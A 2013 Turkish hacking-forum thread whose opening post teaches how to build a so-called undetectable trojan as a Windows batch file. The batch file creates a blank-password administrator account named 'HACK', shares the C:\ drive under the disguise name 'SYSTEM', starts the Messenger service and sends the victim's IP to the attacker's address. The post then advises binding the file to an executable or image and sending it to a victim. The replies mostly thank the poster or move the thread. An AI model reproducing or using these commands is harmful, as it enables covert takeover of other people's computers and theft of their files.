İPUCU

Trojan ve Virüsler Trojan ve Virüsler Hakkında Bilgiler.

Seçenekler

No Defteri İle Antivirüse Yakalanmayan virüs yapma

23-05-2013 18:33
#1
Ataturkum - ait Kullanıcı Resmi (Avatar)
Forumdan Uzaklaştırıldı
Üyelik tarihi:
05/2013
Mesajlar:
390
Teşekkür (Etti):
23
Teşekkür (Aldı):
13
Konular:
37
Dökümanı tamamen okursanız size yararı olucagını düşünüyorum...

Evet arkadaslar* konunun başlığından da anlayabileceginiz gibi Anti Virüs programları tarafından tanınmayan tamamen size ait bir truva atı yapmayı size kısaca anlatacağım;

Truva atının ana amacı* adından da anlaşılacağı gibi hedef sisteme sızarak sistemi ele geçirmek ya da bilgi toplamaktır. Dikkat edin zarar vermek demiyorum çünkü bu etik olarak yanlış bir harekettir

Piyasada bu konuda son derece fonksiyonel bircok truva atı var fakat bu truva atlarını kodlayanların hepsi Ticari amac güttükleri icin ki bu konuda da sonuna kadar haklıdırlar* Truva atlarının özel yapım(special edition) olan versiyonlarının dışındaki tüm Public versiyonlari maalesef AV lerce tanınmakta ve hepsinden önemlisi Firewallar tarafindan engellenmektedirler ve bu da kullanıcılarin işini oldukca zorlastırmaktadır.

Size şimdi anlatacağim yöntem* biraz mantık biraz da teknik bilgi gerektirmektedir. Bu ikisinin dışında başka hicbir programa(toola) ihtiyacınız yoktur.

Şimdi Truva atımızı hazırlamaya başlayalım;

1-) Öncelikle bir TXT dosyası açın ve içine şu komutu girin;

net user HACK /add

Bu komut sayesinde kurbanin makinasında "HACK" isminde bir user yarattık. Fakat bu user hesabı normal olarak açıldigi icin hakları da sınırlı olacaktır. Bu nedenle ikinci aşamaya geçiyoruz;

2-) şimdi yukarıdaki komutun hemen bir alt satırına geçin ve şu komutu ekleyin;

net localgroup administrators HACK /add

Böylece "HACK" isimli kullanıcı hesabını* direk yönetici(admin) grubuna kattık. Artık "HACK" hesabımız tüm yetkilere sahip.

3-) Simdi de kurbanımızın makinasındaki C:\\ sürücüsünü sınırsız paylaşıma açacağız. Kurbanı da huylandırmamak için paylaşım adını SYSTEM olarak yapacağız. Bunun için aşağıdaki komutu kullanacağız;

net share system=C:\\ /unlimited

Evet artık Kurbanımızın makinasını sonuna kadar açtık. Peki kurbanın IP sini nereden bileceğiz de kurbanın makinasina bu yarattığımız "HACK" hesabından bağlanacağız?

Bunun için de kodumuza bir satırlık bir komut daha ekleyeceğiz;

4-) NET SEND komutunu kullanarak kurbanın bize Windows’un Messaging Servisi vasıtası ile mesaj atmasını ve IP sını bize söylemesini saglayacağız. Bunun icin aşağıdaki komutu da kodunuzun içerisine ekleyin;

net send 82.35.23.46(buraya kendi IP nizi girin) Ben senin kurbanınım Gel bana baglan

Unutmayın 82. li baslayan IP adresi yerine kendi IP nizi yazin.

4-) Son olarak ufak bir önlem alacagiz. Peki nedir bu önlem? Bildiğiniz gibi Windows Messenger Servisini kullanan internette ortalıkta gezinen bircok ufak tefek Spylar oldugu icin Messenger servisi genelde Disabled ’dir. Disabled olursa NET SEND komutu bir işe yaramaz. Iste bu son önlemimizde de bu servisi Disabled tan Automatic moduna set ettirecegiz. Öncelikle Administrative Tools dan Services sekmesine giriyoruz ve oradan Messenger servisinin kod icerisinde kullanacagimiz adını öğreniyoruz. Adi Messenger ’mis. simdi bu adı kullanarak bu servisi çalıstırıyoruz.

net start Messenger

Size tavsiyem* bu son komutu kodunuzun en basina koymaniz. Böylelikle ardışık sırada önce Messenger servisi çalıştırılacak daha sonra diğer işlemler yapılacaktır. Kodun sağlıklı çalışması açısından bu 4. şıkkı ilk sıraya koymanız daha iyi olur.

Son olarak TXT de yazdığınız kodunuzu .bat olarak istediginiz bir isimde kaydedin ve ister bir EXE ile join ettirin ister bir resim ile birlestirin isterseniz kurbaniniza direk gönderin.

Kurbanınız bu dosyayı çalıştırdiğı an makinasında Admin haklarına sahip HACK adında bir user açılacak ve şifresi de blank yani boş olacaktır. C:\\ sürücüsü de full olarak paylasima açilmış olacak ve son olarak da IP si size gelecektir.
[ALINTIDIR]....
Konu Ataturkum tarafından (24-05-2013 20:14 Saat 20:14 ) değiştirilmiştir.
TheSLaYe® Teşekkür etti.

23-05-2013 18:34
#2
Üyelik tarihi:
04/2013
Mesajlar:
333
Teşekkür (Etti):
130
Teşekkür (Aldı):
52
Konular:
36
Alıntı galiba ?
Kullanıcı İmzası
23-05-2013 18:38
#3
Ataturkum - ait Kullanıcı Resmi (Avatar)
Forumdan Uzaklaştırıldı
Üyelik tarihi:
05/2013
Mesajlar:
390
Teşekkür (Etti):
23
Teşekkür (Aldı):
13
Konular:
37
Evet myalperen bu kodu deneyiniz antivirüslere yakalanmıyor
23-05-2013 18:48
#4
Üyelik tarihi:
12/2012
Nereden:
uzaydan
Mesajlar:
645
Teşekkür (Etti):
36
Teşekkür (Aldı):
50
Konular:
62
alıntıysa lütfen altına alıntı diye ekliyiniz.
Kullanıcı İmzası
Ne Mutlu TÜRK'üm Diyene..!

Her TÜRK Asker Doğar..!

Ya Sev Ya da Terk et !!!!!

Bu Topraklar bir Bütündür.

...FORUM'A KISA BİR ARA...
23-05-2013 19:42
#5
byankara - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
05/2013
Mesajlar:
25
Teşekkür (Etti):
11
Teşekkür (Aldı):
3
Konular:
0
Doğru
24-05-2013 15:44
#6
94loyka55 - ait Kullanıcı Resmi (Avatar)
E-Mail onayı yapılmamış üye
Üyelik tarihi:
01/2013
Mesajlar:
546
Teşekkür (Etti):
62
Teşekkür (Aldı):
25
Konular:
101
açtığın anda anti yakalıyor
24-05-2013 15:48
#7
netsniffer - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
05/2013
Mesajlar:
129
Teşekkür (Etti):
2
Teşekkür (Aldı):
8
Konular:
5
Guzel bisiye benziyo
24-05-2013 21:31
#8
2eqendy - ait Kullanıcı Resmi (Avatar)
E-Mail onayı yapılmamış üye
Üyelik tarihi:
08/2012
Nereden:
c:/windows/system 32
Mesajlar:
822
Teşekkür (Etti):
82
Teşekkür (Aldı):
53
Konular:
86
Yeri Değil.Virüsler Bölümünde Olmalı.//İhbar
24-05-2013 22:16
#9
-SiPaHi- - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
01/2012
Nereden:
İstanbul
Mesajlar:
12.883
Teşekkür (Etti):
656
Teşekkür (Aldı):
2787
Konular:
1290
-Trojan ve Virüsler bölümüne taşındı/
Kullanıcı İmzası
............

Hayat bu, bir bakarsın her şey bir anda son bulur. Hayat bu, son dediğin an her şey yeniden can bulur.

......
25-05-2013 21:06
#10
HaCKeRLaMeR - ait Kullanıcı Resmi (Avatar)
E-Mail onayı yapılmamış üye
Üyelik tarihi:
04/2013
Mesajlar:
81
Teşekkür (Etti):
13
Teşekkür (Aldı):
2
Konular:
3
Saolkardesm

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı